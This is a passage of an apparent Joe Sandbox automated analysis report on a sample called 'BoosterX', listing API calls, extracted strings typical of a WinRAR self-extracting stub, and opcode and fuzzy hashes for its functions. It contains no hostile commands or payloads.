                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                    • API String ID: 3668304517-727060406
                                                    • Opcode ID: d3aa207b925aaa45bbd348e2706146858f096aab5cdaf612773ab52f2a051993
                                                    • Instruction ID: 56a7973d47be8ac66e5fe5eb1e62485f4892b9158121b9b179435dcbb22b439b
                                                    • Opcode Fuzzy Hash: d3aa207b925aaa45bbd348e2706146858f096aab5cdaf612773ab52f2a051993
                                                    • Instruction Fuzzy Hash: A241D576B05B02A9EB118F64E4843E933A9EB48799F500636DE8CD3B69EF38D155C344
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                    • Instruction ID: 97c25fecaedbe174f6d8ff3be46f50d3497c1227ead9436b531e2453fa87bfab
                                                    • Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                    • Instruction Fuzzy Hash: 52211D64E19A03B1FE28DF60E99517523A0AF88B86F440177CE8EC27A1DF3CE546C704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                    • String ID: DXGIDebug.dll$UNC$\\?\
                                                    • API String ID: 4097890229-4048004291
                                                    • Opcode ID: bd3678a704b3fbe9d4da05dd4776dd800f3f2c11ab756146d0a2ea33823be3c5
                                                    • Instruction ID: 6fd09d31254888a6d2f05fa34331f795055680783a567bce423790d55e0e6859
                                                    • Opcode Fuzzy Hash: bd3678a704b3fbe9d4da05dd4776dd800f3f2c11ab756146d0a2ea33823be3c5
                                                    • Instruction Fuzzy Hash: 3C129B22B08A43A4EA109F65E4481AD6376FB81BD9F504236DB9DC7BE9DF3CD549C340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                    • API String ID: 431506467-1315819833
                                                    • Opcode ID: 934b9c1a3412f36c545f982de326ba61b21e501abc14814ed042a99284b1f3e4
                                                    • Instruction ID: d401dcd8f5ba3855c676a81dbd8a8b6a94794466b628a70139270d5e0207093d
                                                    • Opcode Fuzzy Hash: 934b9c1a3412f36c545f982de326ba61b21e501abc14814ed042a99284b1f3e4
                                                    • Instruction Fuzzy Hash: E4B1BF62F09B83A5FB009FA8D4442BC2362AB85799F504236DE9CE6BD9DF3CE145C344
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 2868844859-1533471033
                                                    • Opcode ID: 0c7c52e401b8d11eced88253f3d41f1411c2599d6453e61bec2c7b8e04503a21
                                                    • Instruction ID: cd603f2c6622f85f2f026bb45e9cb3825cee7ab423402b3ec28fcd04e5ac3f73
                                                    • Opcode Fuzzy Hash: 0c7c52e401b8d11eced88253f3d41f1411c2599d6453e61bec2c7b8e04503a21
                                                    • Instruction Fuzzy Hash: 7381AE22F08A43A5FB00DFA9D9542ED2371AB4578AF400236DE9DD7B9AEF38D506C344
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                    • API String ID: 3215553584-2617248754
                                                    • Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                    • Instruction ID: d33eca2d457c3e59c59b980356984ad9673f2f1f401245b8b735f6a6fec30257
                                                    • Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                    • Instruction Fuzzy Hash: 6641AB72A19B86A9EB00CF25E8417AD33A4EB58398F014636EE9CC7B95DF3CD125C344
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: Window$MessageObjectSend$ClassDeleteLongName
• String ID: STATIC
Similarity
• API ID: ItemTextWindow
• String ID: LICENSEDLG
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: $
Similarity
• API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
Similarity
• API ID: AllocClearStringVariant
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
APIs
• LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C03872F1
• GetLastError.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C03872FF
• LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C0387329
• FreeLibrary.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C038736F
• GetProcAddress.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C038737B
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
APIs
• GetModuleHandleW.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815AB
• GetProcAddress.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815C8
• GetProcAddress.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815E4
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
APIs
  • Part of subcall function 00007FF6C0365164: GetVersionExW.KERNEL32 ref: 00007FF6C0365195
• FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED0C
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED18
• SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED28
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED36
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED44
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED85
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: .rar$exe$rar$sfx
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
                                                    Similarity
                                                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 2102711378-639343689
                                                    • Opcode ID: 89b40b535af03a040ab3a03455bd0731328f990642d65d4a1277120577c57159
                                                    • Instruction ID: 0617e8f7631dd809c73dfadeef1ca01ee2c0248b4634fa4a33641cbed9f7efd1
                                                    • Opcode Fuzzy Hash: 89b40b535af03a040ab3a03455bd0731328f990642d65d4a1277120577c57159
                                                    • Instruction Fuzzy Hash: F351AB66F18A43A5FA219F65D8412BD33A1AF857AAF040131DE9DD77E6DF3CE486C200
                                                    Similarity
                                                    • API ID: Window$Show$Rect
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 2396740005-1658105358
                                                    • Opcode ID: e61806d4995b6197c20590cc1e84a9d2430e7e9d2d5b3509b02ee98fded6cc23
                                                    • Instruction ID: 7f88b35553fd2a0302e4af44d54afeeacca7a7612d7775f45d8628becfc0bddc
                                                    • Opcode Fuzzy Hash: e61806d4995b6197c20590cc1e84a9d2430e7e9d2d5b3509b02ee98fded6cc23
                                                    • Instruction Fuzzy Hash: 35519522A09B839AEB249F29E55437A63A0FF89B86F104535DECEC7B55DF3CE1458700
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                    • Instruction ID: 4fe51af4619d4fe10883f7c03f2f1753283ddfb000599a44a19c44c426084470
                                                    • Opcode Fuzzy Hash: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                    • Instruction Fuzzy Hash: 5521DD64A09F8BE5FA108F19A94817823A0FF89B8AF14143AD9CDD7361DF3CE285C344
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                    • Instruction ID: 85beed3094e8419b966913e9f48a9e1aa9637ca189d9298bcb2e8ebfc80f7750
                                                    • Opcode Fuzzy Hash: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                    • Instruction Fuzzy Hash: DEF0FF65A29A43A1EE548F11E8542796360EFC8792F485136EE8FC6764DF3CD585CB00
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                    • Instruction ID: c7768c627e19d0185bcb75e907db2479154b085627fd49c1f0353cbaf2ee7f2d
                                                    • Opcode Fuzzy Hash: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                    • Instruction Fuzzy Hash: 3B810362F18653A9FB209F659880ABD27A0BB45B8AF004236DE8EC77D5DF3CE445C710
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2398171386-0
                                                    • Opcode ID: 576e37249fc770885bef1ed8c76ec8c626bec9fe2c5606531df86f5f014861ad
                                                    • Instruction ID: e499e668b7af905e058b78946674f58f695fff9c2930099f9d177608cf2228d1
                                                    • Opcode Fuzzy Hash: 576e37249fc770885bef1ed8c76ec8c626bec9fe2c5606531df86f5f014861ad
                                                    • Instruction Fuzzy Hash: 7551A022F08A43A9FB548F75E4402BD23B1BB857A9F004635EE9DDB7D9EF3891598340
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 3659116390-0
                                                    • Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                    • Instruction ID: bf82ada75383ed05b2479c398cbdcf3d8b8f7f3acfeefb80b5df06fd9b09a7ab
                                                    • Opcode Fuzzy Hash: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                    • Instruction Fuzzy Hash: 66518B72A18A5299E710CF65E4447AC7BB0BB44B99F088236DF8EC7B98DF38D546C700
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 262959230-0
                                                    • Opcode ID: 232b551fadca1ae103d473e2eb18b0591082179b1a5a78a8c3b0890ea4ad4e1c
                                                    • Instruction ID: 8cef893338143e1f3631acf4a4dde1b9b7a2cb14672666d0eba096c29d93cb87
                                                    • Opcode Fuzzy Hash: 232b551fadca1ae103d473e2eb18b0591082179b1a5a78a8c3b0890ea4ad4e1c
                                                    • Instruction Fuzzy Hash: 2A419022A09A47A9EB149F6194003B92294FF44FA6F144B77EEADC77D5DF3CE1818300
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                    • Instruction ID: 7278a966974de2b167bc0437ab62134a6b4eae48d61b6b789dc6057e2b4d2f94
                                                    • Opcode Fuzzy Hash: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                    • Instruction Fuzzy Hash: 7841E222B09A53A6FE159F67AC006B66295BF44BA1F194637DD9ECB794EF3CE4408300
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                    • Instruction ID: cd47a5f1d94137ee8ec2ea694555ac0bc826990f3480351e9fa1462b9a515cbb
                                                    • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                    • Instruction Fuzzy Hash: 9D11C636E5CA0325F6541D28E4823B911416F553B3FD95634EAEEC77D6CF2CA4C44321
                                                    Similarity
                                                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                    • String ID:
                                                    • API String ID: 3621893840-0
                                                    • Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                    • Instruction ID: 2b37f25f723ceaad709764c1872a024314573991d7774711081b0254f01d1655
                                                    • Opcode Fuzzy Hash: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                    • Instruction Fuzzy Hash: 5DF04F21B38857A2F7608F28E895E762251FFE4706F545030EA8FC1A949F3CD149C700
                                                    Similarity
                                                    • API ID: __except_validate_context_recordabort
                                                    • String ID: csm$csm
                                                    • API String ID: 746414643-3733052814
                                                    • Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                    • Instruction ID: 39ffb15ae2e55c7b53f66660684b93a9d02c2d31522f830264daa922bb82c4c4
                                                    • Opcode Fuzzy Hash: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                    • Instruction Fuzzy Hash: B571A0726086929ADB608F26905477D7BA5EB41B8AF0482B7DECCC7B89CF3CD591C701
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: $*
                                                    • API String ID: 3215553584-3982473090
                                                    • Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                    • Instruction ID: e4de98d464e22e8fb56e428d2aa781636e9609cd179eefa9ae72d26757a6e1af
                                                    • Opcode Fuzzy Hash: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                    • Instruction Fuzzy Hash: 0451507290C647AAE7658F34904937C3BA1EB55B0AF1417B7CECEC2399CF28E586C605
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$StringType
                                                    • String ID: $%s
                                                    • API String ID: 3586891840-3791308623
                                                    • Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                    • Instruction ID: be372b6664e56bf8aaf6bbc8e82d8d4627e85c11816032940ccdd7f5f8980f62
                                                    • Opcode Fuzzy Hash: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                    • Instruction Fuzzy Hash: E8419F22B18B83AAEB608F65D8006A92391FB45BA9F480636DE9DD77D5DF3CE4418300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                    • String ID: csm
                                                    • API String ID: 2466640111-1018135373
                                                    • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                    • Instruction ID: 3cccebfb8b8387d7e657a50c21df6f9a4550e985fb11cbf73bd8ff002013cf29
                                                    • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                    • Instruction Fuzzy Hash: 97518E7261874296DA20AF25E44426E77E4FB88B96F400677EBCDC7B55DF38E050CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: U
                                                    • API String ID: 2456169464-4171548499
                                                    • Opcode ID: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                    • Instruction ID: 026ab394987b51ee6bc0803fbd8227caa152a7fd8366991a00337137ad841d9b
                                                    • Opcode Fuzzy Hash: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                    • Instruction Fuzzy Hash: 5E41D322B18A82A6EB20CF25E8447BA77A0FB88795F444131EE8DC7798DF7CD451CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease
                                                    • String ID:
                                                    • API String ID: 1429681911-3916222277
                                                    • Opcode ID: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                    • Instruction ID: 260a4936808f349ed56e11e4c0eabd54a014f3a2c9fadb10bbfe2b5cfab14623
                                                    • Opcode Fuzzy Hash: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                    • Instruction Fuzzy Hash: 6E313A35608B5296EA04AF17B81862AB7A0F789FD6F504435ED8F83B94CF3CE449CB00
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E837
                                                    • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E847
                                                    • CreateEventW.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E860
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                    • Instruction ID: ea5c9c0a6312540dc6a2109fd10c06321fb381b7b965bcf0f057b7678d93f34e
                                                    • Opcode Fuzzy Hash: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                    • Instruction Fuzzy Hash: 3221A232A1964396F7108F24E4547AD32A1FB98B0EF188035CA8DCB395CF7E945A8B84
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
